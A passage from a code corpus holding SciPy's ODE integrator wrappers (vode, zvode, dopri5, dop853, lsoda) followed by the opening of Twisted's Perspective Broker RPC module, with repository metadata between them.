jac_tmp[1::2, ::2] = imag(jac)
jac_tmp[::2, 1::2] = -jac_tmp[1::2, ::2]
ml = getattr(self._integrator, 'ml', None)
mu = getattr(self._integrator, 'mu', None)
if ml is not None or mu is not None:
# Jacobian is banded. The user's Jacobian function has computed
# the complex Jacobian in packed format. The corresponding
# real-valued version has every other column shifted up.
jac_tmp = _transform_banded_jac(jac_tmp)
return jac_tmp
@property
def y(self):
return self._y[::2] + 1j * self._y[1::2]
def set_integrator(self, name, **integrator_params):
"""
Set integrator by name.
Parameters
----------
name : str
Name of the integrator
integrator_params
Additional parameters for the integrator.
"""
if name == 'zvode':
raise ValueError("zvode must be used with ode, not complex_ode")
lband = integrator_params.get('lband')
uband = integrator_params.get('uband')
if lband is not None or uband is not None:
# The Jacobian is banded. Override the user-supplied bandwidths
# (which are for the complex Jacobian) with the bandwidths of
# the corresponding real-valued Jacobian wrapper of the complex
# Jacobian.
integrator_params['lband'] = 2 * (lband or 0) + 1
integrator_params['uband'] = 2 * (uband or 0) + 1
return ode.set_integrator(self, name, **integrator_params)
def set_initial_value(self, y, t=0.0):
"""Set initial conditions y(t) = y."""
y = asarray(y)
self.tmp = zeros(y.size * 2, 'float')
self.tmp[::2] = real(y)
self.tmp[1::2] = imag(y)
return ode.set_initial_value(self, self.tmp, t)
def integrate(self, t, step=False, relax=False):
"""Find y=y(t), set y as an initial condition, and return y.
Parameters
----------
t : float
The endpoint of the integration step.
step : bool
If True, and if the integrator supports the step method,
then perform a single integration step and return.
This parameter is provided in order to expose internals of
the implementation, and should not be changed from its default
value in most cases.
relax : bool
If True and if the integrator supports the run_relax method,
then integrate until t_1 >= t and return. ``relax`` is not
referenced if ``step=True``.
This parameter is provided in order to expose internals of
the implementation, and should not be changed from its default
value in most cases.
Returns
-------
y : float
The integrated value at t
"""
y = ode.integrate(self, t, step, relax)
return y[::2] + 1j * y[1::2]
def set_solout(self, solout):
"""
Set callable to be called at every successful integration step.
Parameters
----------
solout : callable
``solout(t, y)`` is called at each internal integrator step,
t is a scalar providing the current independent position
            y is the current solution ``y.shape == (n,)``
solout should return -1 to stop integration
otherwise it should return None or 0
"""
if self._integrator.supports_solout:
self._integrator.set_solout(solout, complex=True)
else:
raise TypeError("selected integrator does not support solouta,"
+ "choose another one")
# ------------------------------------------------------------------------------
# ODE integrators
# ------------------------------------------------------------------------------
def find_integrator(name):
for cl in IntegratorBase.integrator_classes:
if re.match(name, cl.__name__, re.I):
return cl
return None
class IntegratorConcurrencyError(RuntimeError):
"""
Failure due to concurrent usage of an integrator that can be used
only for a single problem at a time.
"""
def __init__(self, name):
msg = ("Integrator `%s` can be used to solve only a single problem "
"at a time. If you want to integrate multiple problems, "
"consider using a different integrator "
"(see `ode.set_integrator`)") % name
RuntimeError.__init__(self, msg)
class IntegratorBase:
runner = None # runner is None => integrator is not available
success = None # success==1 if integrator was called successfully
istate = None # istate > 0 means success, istate < 0 means failure
supports_run_relax = None
supports_step = None
supports_solout = False
integrator_classes = []
scalar = float
def acquire_new_handle(self):
# Some of the integrators have internal state (ancient
# Fortran...), and so only one instance can use them at a time.
# We keep track of this, and fail when concurrent usage is tried.
self.__class__.active_global_handle += 1
self.handle = self.__class__.active_global_handle
def check_handle(self):
if self.handle is not self.__class__.active_global_handle:
raise IntegratorConcurrencyError(self.__class__.__name__)
def reset(self, n, has_jac):
"""Prepare integrator for call: allocate memory, set flags, etc.
n - number of equations.
has_jac - if user has supplied function for evaluating Jacobian.
"""
def run(self, f, jac, y0, t0, t1, f_params, jac_params):
"""Integrate from t=t0 to t=t1 using y0 as an initial condition.
Return 2-tuple (y1,t1) where y1 is the result and t=t1
defines the stoppage coordinate of the result.
"""
raise NotImplementedError('all integrators must define '
'run(f, jac, t0, t1, y0, f_params, jac_params)')
def step(self, f, jac, y0, t0, t1, f_params, jac_params):
"""Make one integration step and return (y1,t1)."""
raise NotImplementedError('%s does not support step() method' %
self.__class__.__name__)
def run_relax(self, f, jac, y0, t0, t1, f_params, jac_params):
"""Integrate from t=t0 to t>=t1 and return (y1,t)."""
raise NotImplementedError('%s does not support run_relax() method' %
self.__class__.__name__)
# XXX: __str__ method for getting visual state of the integrator
def _vode_banded_jac_wrapper(jacfunc, ml, jac_params):
"""
Wrap a banded Jacobian function with a function that pads
the Jacobian with `ml` rows of zeros.
"""
def jac_wrapper(t, y):
jac = asarray(jacfunc(t, y, *jac_params))
padded_jac = vstack((jac, zeros((ml, jac.shape[1]))))
return padded_jac
return jac_wrapper
class vode(IntegratorBase):
runner = getattr(_vode, 'dvode', None)
messages = {-1: 'Excess work done on this call. (Perhaps wrong MF.)',
-2: 'Excess accuracy requested. (Tolerances too small.)',
-3: 'Illegal input detected. (See printed message.)',
-4: 'Repeated error test failures. (Check all input.)',
-5: 'Repeated convergence failures. (Perhaps bad'
' Jacobian supplied or wrong choice of MF or tolerances.)',
-6: 'Error weight became zero during problem. (Solution'
' component i vanished, and ATOL or ATOL(i) = 0.)'
}
supports_run_relax = 1
supports_step = 1
active_global_handle = 0
def __init__(self,
method='adams',
with_jacobian=False,
rtol=1e-6, atol=1e-12,
lband=None, uband=None,
order=12,
nsteps=500,
max_step=0.0, # corresponds to infinite
min_step=0.0,
first_step=0.0, # determined by solver
):
if re.match(method, r'adams', re.I):
self.meth = 1
elif re.match(method, r'bdf', re.I):
self.meth = 2
else:
raise ValueError('Unknown integration method %s' % method)
self.with_jacobian = with_jacobian
self.rtol = rtol
self.atol = atol
self.mu = uband
self.ml = lband
self.order = order
self.nsteps = nsteps
self.max_step = max_step
self.min_step = min_step
self.first_step = first_step
self.success = 1
self.initialized = False
def _determine_mf_and_set_bands(self, has_jac):
"""
Determine the `MF` parameter (Method Flag) for the Fortran subroutine `dvode`.
In the Fortran code, the legal values of `MF` are:
10, 11, 12, 13, 14, 15, 20, 21, 22, 23, 24, 25,
-11, -12, -14, -15, -21, -22, -24, -25
but this Python wrapper does not use negative values.
Returns
mf = 10*self.meth + miter
self.meth is the linear multistep method:
self.meth == 1: method="adams"
self.meth == 2: method="bdf"
miter is the correction iteration method:
          miter == 0: Functional iteration; no Jacobian involved.
miter == 1: Chord iteration with user-supplied full Jacobian.
miter == 2: Chord iteration with internally computed full Jacobian.
miter == 3: Chord iteration with internally computed diagonal Jacobian.
miter == 4: Chord iteration with user-supplied banded Jacobian.
miter == 5: Chord iteration with internally computed banded Jacobian.
Side effects: If either self.mu or self.ml is not None and the other is None,
then the one that is None is set to 0.
"""
jac_is_banded = self.mu is not None or self.ml is not None
if jac_is_banded:
if self.mu is None:
self.mu = 0
if self.ml is None:
self.ml = 0
# has_jac is True if the user provided a Jacobian function.
if has_jac:
if jac_is_banded:
miter = 4
else:
miter = 1
else:
if jac_is_banded:
if self.ml == self.mu == 0:
miter = 3 # Chord iteration with internal diagonal Jacobian.
else:
miter = 5 # Chord iteration with internal banded Jacobian.
else:
# self.with_jacobian is set by the user in the call to ode.set_integrator.
if self.with_jacobian:
miter = 2 # Chord iteration with internal full Jacobian.
else:
                    miter = 0  # Functional iteration; no Jacobian involved.
mf = 10 * self.meth + miter
return mf
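    # Illustrative example (not in the original source): method='bdf' (meth=2)
    # combined with a user-supplied full Jacobian (miter=1) gives
    # mf = 10 * 2 + 1 = 21.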
def reset(self, n, has_jac):
mf = self._determine_mf_and_set_bands(has_jac)
if mf == 10:
lrw = 20 + 16 * n
elif mf in [11, 12]:
lrw = 22 + 16 * n + 2 * n * n
elif mf == 13:
lrw = 22 + 17 * n
elif mf in [14, 15]:
lrw = 22 + 18 * n + (3 * self.ml + 2 * self.mu) * n
elif mf == 20:
lrw = 20 + 9 * n
elif mf in [21, 22]:
lrw = 22 + 9 * n + 2 * n * n
elif mf == 23:
lrw = 22 + 10 * n
elif mf in [24, 25]:
lrw = 22 + 11 * n + (3 * self.ml + 2 * self.mu) * n
else:
raise ValueError('Unexpected mf=%s' % mf)
if mf % 10 in [0, 3]:
liw = 30
else:
liw = 30 + n
rwork = zeros((lrw,), float)
rwork[4] = self.first_step
rwork[5] = self.max_step
rwork[6] = self.min_step
self.rwork = rwork
iwork = zeros((liw,), _vode_int_dtype)
if self.ml is not None:
iwork[0] = self.ml
if self.mu is not None:
iwork[1] = self.mu
iwork[4] = self.order
iwork[5] = self.nsteps
iwork[6] = 2 # mxhnil
self.iwork = iwork
self.call_args = [self.rtol, self.atol, 1, 1,
self.rwork, self.iwork, mf]
self.success = 1
self.initialized = False
def run(self, f, jac, y0, t0, t1, f_params, jac_params):
if self.initialized:
self.check_handle()
else:
self.initialized = True
self.acquire_new_handle()
if self.ml is not None and self.ml > 0:
# Banded Jacobian. Wrap the user-provided function with one
# that pads the Jacobian array with the extra `self.ml` rows
# required by the f2py-generated wrapper.
jac = _vode_banded_jac_wrapper(jac, self.ml, jac_params)
args = ((f, jac, y0, t0, t1) + tuple(self.call_args) +
(f_params, jac_params))
y1, t, istate = self.runner(*args)
self.istate = istate
if istate < 0:
unexpected_istate_msg = 'Unexpected istate={:d}'.format(istate)
warnings.warn('{:s}: {:s}'.format(self.__class__.__name__,
self.messages.get(istate, unexpected_istate_msg)))
self.success = 0
else:
self.call_args[3] = 2 # upgrade istate from 1 to 2
self.istate = 2
return y1, t
def step(self, *args):
itask = self.call_args[2]
self.call_args[2] = 2
r = self.run(*args)
self.call_args[2] = itask
return r
def run_relax(self, *args):
itask = self.call_args[2]
self.call_args[2] = 3
r = self.run(*args)
self.call_args[2] = itask
return r
if vode.runner is not None:
IntegratorBase.integrator_classes.append(vode)
class zvode(vode):
runner = getattr(_vode, 'zvode', None)
supports_run_relax = 1
supports_step = 1
scalar = complex
active_global_handle = 0
def reset(self, n, has_jac):
mf = self._determine_mf_and_set_bands(has_jac)
if mf in (10,):
lzw = 15 * n
elif mf in (11, 12):
lzw = 15 * n + 2 * n ** 2
elif mf in (-11, -12):
lzw = 15 * n + n ** 2
elif mf in (13,):
lzw = 16 * n
elif mf in (14, 15):
lzw = 17 * n + (3 * self.ml + 2 * self.mu) * n
elif mf in (-14, -15):
lzw = 16 * n + (2 * self.ml + self.mu) * n
elif mf in (20,):
lzw = 8 * n
elif mf in (21, 22):
lzw = 8 * n + 2 * n ** 2
elif mf in (-21, -22):
lzw = 8 * n + n ** 2
elif mf in (23,):
lzw = 9 * n
elif mf in (24, 25):
lzw = 10 * n + (3 * self.ml + 2 * self.mu) * n
elif mf in (-24, -25):
lzw = 9 * n + (2 * self.ml + self.mu) * n
lrw = 20 + n
if mf % 10 in (0, 3):
liw = 30
else:
liw = 30 + n
zwork = zeros((lzw,), complex)
self.zwork = zwork
rwork = zeros((lrw,), float)
rwork[4] = self.first_step
rwork[5] = self.max_step
rwork[6] = self.min_step
self.rwork = rwork
iwork = zeros((liw,), _vode_int_dtype)
if self.ml is not None:
iwork[0] = self.ml
if self.mu is not None:
iwork[1] = self.mu
iwork[4] = self.order
iwork[5] = self.nsteps
iwork[6] = 2 # mxhnil
self.iwork = iwork
self.call_args = [self.rtol, self.atol, 1, 1,
self.zwork, self.rwork, self.iwork, mf]
self.success = 1
self.initialized = False
if zvode.runner is not None:
IntegratorBase.integrator_classes.append(zvode)
class dopri5(IntegratorBase):
runner = getattr(_dop, 'dopri5', None)
name = 'dopri5'
supports_solout = True
messages = {1: 'computation successful',
2: 'computation successful (interrupted by solout)',
-1: 'input is not consistent',
-2: 'larger nsteps is needed',
-3: 'step size becomes too small',
-4: 'problem is probably stiff (interrupted)',
}
def __init__(self,
rtol=1e-6, atol=1e-12,
nsteps=500,
max_step=0.0,
first_step=0.0, # determined by solver
safety=0.9,
ifactor=10.0,
dfactor=0.2,
beta=0.0,
method=None,
verbosity=-1, # no messages if negative
):
self.rtol = rtol
self.atol = atol
self.nsteps = nsteps
self.max_step = max_step
self.first_step = first_step
self.safety = safety
self.ifactor = ifactor
self.dfactor = dfactor
self.beta = beta
self.verbosity = verbosity
self.success = 1
self.set_solout(None)
def set_solout(self, solout, complex=False):
self.solout = solout
self.solout_cmplx = complex
if solout is None:
self.iout = 0
else:
self.iout = 1
def reset(self, n, has_jac):
work = zeros((8 * n + 21,), float)
work[1] = self.safety
work[2] = self.dfactor
work[3] = self.ifactor
work[4] = self.beta
work[5] = self.max_step
work[6] = self.first_step
self.work = work
iwork = zeros((21,), _dop_int_dtype)
iwork[0] = self.nsteps
iwork[2] = self.verbosity
self.iwork = iwork
self.call_args = [self.rtol, self.atol, self._solout,
self.iout, self.work, self.iwork]
self.success = 1
def run(self, f, jac, y0, t0, t1, f_params, jac_params):
x, y, iwork, istate = self.runner(*((f, t0, y0, t1) +
tuple(self.call_args) + (f_params,)))
self.istate = istate
if istate < 0:
unexpected_istate_msg = 'Unexpected istate={:d}'.format(istate)
warnings.warn('{:s}: {:s}'.format(self.__class__.__name__,
self.messages.get(istate, unexpected_istate_msg)))
self.success = 0
return y, x
def _solout(self, nr, xold, x, y, nd, icomp, con):
if self.solout is not None:
if self.solout_cmplx:
y = y[::2] + 1j * y[1::2]
return self.solout(x, y)
else:
return 1
if dopri5.runner is not None:
IntegratorBase.integrator_classes.append(dopri5)
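# A sketch of the solout hook that dopri5 exposes, again via the public
# scipy.integrate.ode interface; the oscillator and the stopping rule are
# made-up examples.  solout is invoked after every accepted step, and a
# return value of -1 asks the integrator to stop early.
def _example_dopri5_solout():
    from scipy.integrate import ode

    def f(t, y):
        # simple harmonic oscillator
        return [y[1], -y[0]]

    def solout(t, y):
        # stop as soon as the first component crosses zero
        return -1 if y[0] < 0 else 0

    solver = ode(f)
    solver.set_integrator('dopri5', rtol=1e-8, nsteps=10000)
    solver.set_solout(solout)   # set before the initial value
    solver.set_initial_value([1.0, 0.0], 0.0)
    solver.integrate(10.0)
    return solver.t, solver.y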
class dop853(dopri5):
runner = getattr(_dop, 'dop853', None)
name = 'dop853'
def __init__(self,
rtol=1e-6, atol=1e-12,
nsteps=500,
max_step=0.0,
first_step=0.0, # determined by solver
safety=0.9,
ifactor=6.0,
dfactor=0.3,
beta=0.0,
method=None,
verbosity=-1, # no messages if negative
):
super().__init__(rtol, atol, nsteps, max_step, first_step, safety,
ifactor, dfactor, beta, method, verbosity)
def reset(self, n, has_jac):
work = zeros((11 * n + 21,), float)
work[1] = self.safety
work[2] = self.dfactor
work[3] = self.ifactor
work[4] = self.beta
work[5] = self.max_step
work[6] = self.first_step
self.work = work
iwork = zeros((21,), _dop_int_dtype)
iwork[0] = self.nsteps
iwork[2] = self.verbosity
self.iwork = iwork
self.call_args = [self.rtol, self.atol, self._solout,
self.iout, self.work, self.iwork]
self.success = 1
if dop853.runner is not None:
IntegratorBase.integrator_classes.append(dop853)
class lsoda(IntegratorBase):
runner = getattr(_lsoda, 'lsoda', None)
active_global_handle = 0
messages = {
2: "Integration successful.",
-1: "Excess work done on this call (perhaps wrong Dfun type).",
-2: "Excess accuracy requested (tolerances too small).",
-3: "Illegal input detected (internal error).",
-4: "Repeated error test failures (internal error).",
-5: "Repeated convergence failures (perhaps bad Jacobian or tolerances).",
-6: "Error weight became zero during problem.",
-7: "Internal workspace insufficient to finish (internal error)."
}
def __init__(self,
with_jacobian=False,
rtol=1e-6, atol=1e-12,
lband=None, uband=None,
nsteps=500,
max_step=0.0, # corresponds to infinite
min_step=0.0,
first_step=0.0, # determined by solver
ixpr=0,
max_hnil=0,
max_order_ns=12,
max_order_s=5,
method=None
):
self.with_jacobian = with_jacobian
self.rtol = rtol
self.atol = atol
self.mu = uband
self.ml = lband
self.max_order_ns = max_order_ns
self.max_order_s = max_order_s
self.nsteps = nsteps
self.max_step = max_step
self.min_step = min_step
self.first_step = first_step
self.ixpr = ixpr
self.max_hnil = max_hnil
self.success = 1
self.initialized = False
def reset(self, n, has_jac):
# Calculate parameters for the Fortran subroutine lsoda.
if has_jac:
if self.mu is None and self.ml is None:
jt = 1
else:
if self.mu is None:
self.mu = 0
if self.ml is None:
self.ml = 0
jt = 4
else:
if self.mu is None and self.ml is None:
jt = 2
else:
if self.mu is None:
self.mu = 0
if self.ml is None:
self.ml = 0
jt = 5
lrn = 20 + (self.max_order_ns + 4) * n
if jt in [1, 2]:
lrs = 22 + (self.max_order_s + 4) * n + n * n
elif jt in [4, 5]:
lrs = 22 + (self.max_order_s + 5 + 2 * self.ml + self.mu) * n
else:
raise ValueError('Unexpected jt=%s' % jt)
lrw = max(lrn, lrs)
liw = 20 + n
rwork = zeros((lrw,), float)
rwork[4] = self.first_step
rwork[5] = self.max_step
rwork[6] = self.min_step
self.rwork = rwork
iwork = zeros((liw,), _lsoda_int_dtype)
if self.ml is not None:
iwork[0] = self.ml
if self.mu is not None:
iwork[1] = self.mu
iwork[4] = self.ixpr
iwork[5] = self.nsteps
iwork[6] = self.max_hnil
iwork[7] = self.max_order_ns
iwork[8] = self.max_order_s
self.iwork = iwork
self.call_args = [self.rtol, self.atol, 1, 1,
self.rwork, self.iwork, jt]
self.success = 1
self.initialized = False
def run(self, f, jac, y0, t0, t1, f_params, jac_params):
if self.initialized:
self.check_handle()
else:
self.initialized = True
self.acquire_new_handle()
args = [f, y0, t0, t1] + self.call_args[:-1] + \
[jac, self.call_args[-1], f_params, 0, jac_params]
y1, t, istate = self.runner(*args)
self.istate = istate
if istate < 0:
unexpected_istate_msg = 'Unexpected istate={:d}'.format(istate)
warnings.warn('{:s}: {:s}'.format(self.__class__.__name__,
self.messages.get(istate, unexpected_istate_msg)))
self.success = 0
else:
self.call_args[3] = 2 # upgrade istate from 1 to 2
self.istate = 2
return y1, t
def step(self, *args):
itask = self.call_args[2]
self.call_args[2] = 2
r = self.run(*args)
self.call_args[2] = itask
return r
def run_relax(self, *args):
itask = self.call_args[2]
self.call_args[2] = 3
r = self.run(*args)
self.call_args[2] = itask
return r
if lsoda.runner:
IntegratorBase.integrator_classes.append(lsoda)
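# A sketch showing lsoda's automatic switching between non-stiff and stiff
# methods through the public scipy.integrate.ode interface; the Van der Pol
# system and parameter value are made-up examples.  The lband/uband keywords
# map onto the ml/mu attributes consumed by lsoda.reset above.
def _example_lsoda_usage():
    from scipy.integrate import ode

    def f(t, y, mu):
        # Van der Pol oscillator, stiff for large mu
        return [y[1], mu * (1.0 - y[0] ** 2) * y[1] - y[0]]

    solver = ode(f)
    solver.set_integrator('lsoda', rtol=1e-8, atol=1e-10, nsteps=5000)
    solver.set_initial_value([2.0, 0.0], 0.0)
    solver.set_f_params(1000.0)
    solver.integrate(1.0)
    return solver.y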
|
e-q/scipy
|
scipy/integrate/_ode.py
|
Python
|
bsd-3-clause
| 48,017
|
# -*- test-case-name: twisted.test.test_pb -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Perspective Broker
\"This isn\'t a professional opinion, but it's probably got enough
internet to kill you.\" --glyph
Introduction
============
This is a broker for proxies for and copies of objects. It provides a
translucent interface layer to those proxies.
The protocol is not opaque, because it provides objects which represent the
remote proxies and require no context (server references, IDs) to operate on.
It is not transparent because it does I{not} attempt to make remote objects
behave identically, or even similarly, to local objects. Method calls are
invoked asynchronously, and specific rules are applied when serializing
arguments.
To get started, begin with L{PBClientFactory} and L{PBServerFactory}.
@author: Glyph Lefkowitz
"""
import random
import types
from zope.interface import implements, Interface
# Twisted Imports
from twisted.python import log, failure, reflect
from twisted.python.hashlib import md5
from twisted.internet import defer, protocol
from twisted.cred.portal import Portal
from twisted.cred.credentials import IAnonymous, ICredentials
from twisted.cred.credentials import IUsernameHashedPassword, Anonymous
from twisted.persisted import styles
from twisted.python.components import registerAdapter
from twisted.spread.interfaces import IJellyable, IUnjellyable
from twisted.spread.jelly import jelly, unjelly, globalSecurity
from twisted.spread import banana
from twisted.spread.flavors import Serializable
from twisted.spread.flavors import Referenceable, NoSuchMethod
from twisted.spread.flavors import Root, IPBRoot
from twisted.spread.flavors import ViewPoint
from twisted.spread.flavors import Viewable
from twisted.spread.flavors import Copyable
from twisted.spread.flavors import Jellyable
from twisted.spread.flavors import Cacheable
from twisted.spread.flavors import RemoteCopy
from twisted.spread.flavors import RemoteCache
from twisted.spread.flavors import RemoteCacheObserver
from twisted.spread.flavors import copyTags
from twisted.spread.flavors import setUnjellyableForClass
from twisted.spread.flavors import setUnjellyableFactoryForClass
from twisted.spread.flavors import setUnjellyableForClassTree
# These three are backwards compatibility aliases for the previous three.
# Ultimately they should be deprecated. -exarkun
from twisted.spread.flavors import setCopierForClass
from twisted.spread.flavors import setFactoryForClass
from twisted.spread.flavors import setCopierForClassTree
MAX_BROKER_REFS = 1024
portno = 8787
class ProtocolError(Exception):
"""
This error is raised when an invalid protocol statement is received.
"""
class DeadReferenceError(ProtocolError):
"""
This error is raised when a method is called on a dead reference (one whose
broker has been disconnected).
"""
class Error(Exception):
"""
This error can be raised to generate known error conditions.
When a PB callable method (perspective_, remote_, view_) raises
this error, it indicates that a traceback should not be printed,
but instead, the string representation of the exception should be
sent.
"""
class RemoteError(Exception):
"""
This class is used to wrap a string-ified exception from the remote side to
be able to reraise it. (Raising string exceptions is no longer possible in
Python 2.6+)
The value of this exception will be a str() representation of the remote
value.
@ivar remoteType: The full import path of the exception class which was
raised on the remote end.
@type remoteType: C{str}
@ivar remoteTraceback: The remote traceback.
@type remoteTraceback: C{str}
@note: It's not possible to include the remoteTraceback if this exception is
thrown into a generator. It must be accessed as an attribute.
"""
def __init__(self, remoteType, value, remoteTraceback):
Exception.__init__(self, value)
self.remoteType = remoteType
self.remoteTraceback = remoteTraceback
class RemoteMethod:
"""
This is a translucent reference to a remote message.
"""
def __init__(self, obj, name):
"""
Initialize with a L{RemoteReference} and the name of this message.
"""
self.obj = obj
self.name = name
def __cmp__(self, other):
return cmp((self.obj, self.name), other)
def __hash__(self):
return hash((self.obj, self.name))
def __call__(self, *args, **kw):
"""
Asynchronously invoke a remote method.
"""
return self.obj.broker._sendMessage('',self.obj.perspective,
self.obj.luid, self.name, args, kw)
class PBConnectionLost(Exception):
pass
class IPerspective(Interface):
"""
per*spec*tive, n. : The relationship of aspects of a subject to each
other and to a whole: 'a perspective of history'; 'a need to view
the problem in the proper perspective'.
This is a Perspective Broker-specific wrapper for an avatar. That
is to say, a PB-published view on to the business logic for the
system's concept of a 'user'.
The concept of attached/detached is no longer implemented by the
framework. The realm is expected to implement such semantics if
needed.
"""
def perspectiveMessageReceived(broker, message, args, kwargs):
"""
This method is called when a network message is received.
@arg broker: The Perspective Broker.
@type message: str
@arg message: The name of the method called by the other end.
@type args: list in jelly format
@arg args: The arguments that were passed by the other end. It
is recommended that you use the `unserialize' method of the
broker to decode this.
@type kwargs: dict in jelly format
@arg kwargs: The keyword arguments that were passed by the
other end. It is recommended that you use the
`unserialize' method of the broker to decode this.
@rtype: A jelly list.
@return: It is recommended that you use the `serialize' method
of the broker on whatever object you need to return to
generate the return value.
"""
class Avatar:
"""
A default IPerspective implementor.
This class is intended to be subclassed, and a realm should return
an instance of such a subclass when IPerspective is requested of
it.
A peer requesting a perspective will receive only a
L{RemoteReference} to a pb.Avatar. When a method is called on
that L{RemoteReference}, it will translate to a method on the
remote perspective named 'perspective_methodname'. (For more
information on invoking methods on other objects, see
L{flavors.ViewPoint}.)
"""
implements(IPerspective)
def perspectiveMessageReceived(self, broker, message, args, kw):
"""
This method is called when a network message is received.
This will call::
self.perspective_%(message)s(*broker.unserialize(args),
**broker.unserialize(kw))
to handle the method; subclasses of Avatar are expected to
implement methods using this naming convention.
"""
args = broker.unserialize(args, self)
kw = broker.unserialize(kw, self)
method = getattr(self, "perspective_%s" % message)
try:
state = method(*args, **kw)
except TypeError:
log.msg("%s didn't accept %s and %s" % (method, args, kw))
raise
return broker.serialize(state, self, method, args, kw)
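# A sketch of the perspective_ naming convention described above: a
# hypothetical Avatar subclass whose one remote-callable method a client
# would reach as avatar_reference.callRemote("greet", "world").
class _ExampleUser(Avatar):
    def perspective_greet(self, name):
        # arguments arrive already unserialized by perspectiveMessageReceived
        return "hello, %s" % (name,)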
class AsReferenceable(Referenceable):
"""
A reference directed towards another object.
"""
def __init__(self, object, messageType="remote"):
self.remoteMessageReceived = getattr(
object, messageType + "MessageReceived")
class RemoteReference(Serializable, styles.Ephemeral):
"""
A translucent reference to a remote object.
I may be a reference to a L{flavors.ViewPoint}, a
L{flavors.Referenceable}, or an L{IPerspective} implementor (e.g.,
pb.Avatar). From the client's perspective, it is not possible to
tell which except by convention.
I am a \"translucent\" reference because although no additional
bookkeeping overhead is given to the application programmer for
manipulating a reference, return values are asynchronous.
See also L{twisted.internet.defer}.
@ivar broker: The broker I am obtained through.
@type broker: L{Broker}
"""
implements(IUnjellyable)
def __init__(self, perspective, broker, luid, doRefCount):
"""(internal) Initialize me with a broker and a locally-unique ID.
The ID is unique only to the particular Perspective Broker
instance.
"""
self.luid = luid
self.broker = broker
self.doRefCount = doRefCount
self.perspective = perspective
self.disconnectCallbacks = []
def notifyOnDisconnect(self, callback):
"""Register a callback to be called if our broker gets disconnected.
This callback will be called with one argument, this instance.
"""
assert callable(callback)
self.disconnectCallbacks.append(callback)
if len(self.disconnectCallbacks) == 1:
self.broker.notifyOnDisconnect(self._disconnected)
def dontNotifyOnDisconnect(self, callback):
"""Remove a callback that was registered with notifyOnDisconnect."""
self.disconnectCallbacks.remove(callback)
if not self.disconnectCallbacks:
self.broker.dontNotifyOnDisconnect(self._disconnected)
def _disconnected(self):
"""Called if we are disconnected and have callbacks registered."""
for callback in self.disconnectCallbacks:
callback(self)
self.disconnectCallbacks = None
def jellyFor(self, jellier):
"""If I am being sent back to where I came from, serialize as a local backreference.
"""
if jellier.invoker:
assert self.broker == jellier.invoker, "Can't send references to brokers other than their own."
return "local", self.luid
else:
return "unpersistable", "References cannot be serialized"
def unjellyFor(self, unjellier, unjellyList):
self.__init__(unjellier.invoker.unserializingPerspective, unjellier.invoker, unjellyList[1], 1)
return self
def callRemote(self, _name, *args, **kw):
"""Asynchronously invoke a remote method.
@type _name: C{str}
@param _name: the name of the remote method to invoke
@param args: arguments to serialize for the remote function
@param kw: keyword arguments to serialize for the remote function.
@rtype: L{twisted.internet.defer.Deferred}
@returns: a Deferred which will be fired when the result of
this remote call is received.
"""
# note that we use '_name' instead of 'name' so the user can call
# remote methods with 'name' as a keyword parameter, like this:
# ref.callRemote("getPeopleNamed", count=12, name="Bob")
return self.broker._sendMessage('',self.perspective, self.luid,
_name, args, kw)
def remoteMethod(self, key):
"""Get a L{RemoteMethod} for this key.
"""
return RemoteMethod(self, key)
def __cmp__(self,other):
"""Compare me [to another L{RemoteReference}].
"""
if isinstance(other, RemoteReference):
if other.broker == self.broker:
return cmp(self.luid, other.luid)
return cmp(self.broker, other)
def __hash__(self):
"""Hash me.
"""
return self.luid
def __del__(self):
"""Do distributed reference counting on finalization.
"""
if self.doRefCount:
self.broker.sendDecRef(self.luid)
setUnjellyableForClass("remote", RemoteReference)
class Local:
"""(internal) A reference to a local object.
"""
def __init__(self, object, perspective=None):
"""Initialize.
"""
self.object = object
self.perspective = perspective
self.refcount = 1
def __repr__(self):
return "<pb.Local %r ref:%s>" % (self.object, self.refcount)
def incref(self):
"""Increment and return my reference count.
"""
self.refcount = self.refcount + 1
return self.refcount
def decref(self):
"""Decrement and return my reference count.
"""
self.refcount = self.refcount - 1
return self.refcount
##
# Failure
##
class CopyableFailure(failure.Failure, Copyable):
"""
A L{flavors.RemoteCopy} and L{flavors.Copyable} version of
L{twisted.python.failure.Failure} for serialization.
"""
unsafeTracebacks = 0
def getStateToCopy(self):
"""
Collect state related to the exception which occurred, discarding
state which cannot reasonably be serialized.
"""
state = self.__dict__.copy()
state['tb'] = None
state['frames'] = []
state['stack'] = []
state['value'] = str(self.value) # Exception instance
if isinstance(self.type, str):
state['type'] = self.type
else:
state['type'] = reflect.qual(self.type) # Exception class
if self.unsafeTracebacks:
state['traceback'] = self.getTraceback()
else:
state['traceback'] = 'Traceback unavailable\n'
return state
class CopiedFailure(RemoteCopy, failure.Failure):
"""
A L{CopiedFailure} is a L{pb.RemoteCopy} of a L{failure.Failure}
transfered via PB.
@ivar type: The full import path of the exception class which was raised on
the remote end.
@type type: C{str}
@ivar value: A str() representation of the remote value.
@type value: L{CopiedFailure} or C{str}
@ivar traceback: The remote traceback.
@type traceback: C{str}
"""
def printTraceback(self, file=None, elideFrameworkCode=0, detail='default'):
if file is None:
file = log.logfile
file.write("Traceback from remote host -- ")
file.write(self.traceback)
file.write(self.type + ": " + self.value)
file.write('\n')
def throwExceptionIntoGenerator(self, g):
"""
Throw the original exception into the given generator, preserving
traceback information if available. In the case of a L{CopiedFailure}
where the exception type is a string, a L{pb.RemoteError} is thrown
instead.
@return: The next value yielded from the generator.
@raise StopIteration: If there are no more values in the generator.
@raise RemoteError: The wrapped remote exception.
"""
return g.throw(RemoteError(self.type, self.value, self.traceback))
printBriefTraceback = printTraceback
printDetailedTraceback = printTraceback
setUnjellyableForClass(CopyableFailure, CopiedFailure)
def failure2Copyable(fail, unsafeTracebacks=0):
f = types.InstanceType(CopyableFailure, fail.__dict__)
f.unsafeTracebacks = unsafeTracebacks
return f
class Broker(banana.Banana):
"""I am a broker for objects.
"""
version = 6
username = None
factory = None
def __init__(self, isClient=1, security=globalSecurity):
banana.Banana.__init__(self, isClient)
self.disconnected = 0
self.disconnects = []
self.failures = []
self.connects = []
self.localObjects = {}
self.security = security
self.pageProducers = []
self.currentRequestID = 0
self.currentLocalID = 0
self.unserializingPerspective = None
# Some terms:
# PUID: process unique ID; return value of id() function. type "int".
# LUID: locally unique ID; an ID unique to an object mapped over this
# connection. type "int"
# GUID: (not used yet) globally unique ID; an ID for an object which
# may be on a redirected or meta server. Type as yet undecided.
# Dictionary mapping LUIDs to local objects.
# set above to allow root object to be assigned before connection is made
# self.localObjects = {}
# Dictionary mapping PUIDs to LUIDs.
self.luids = {}
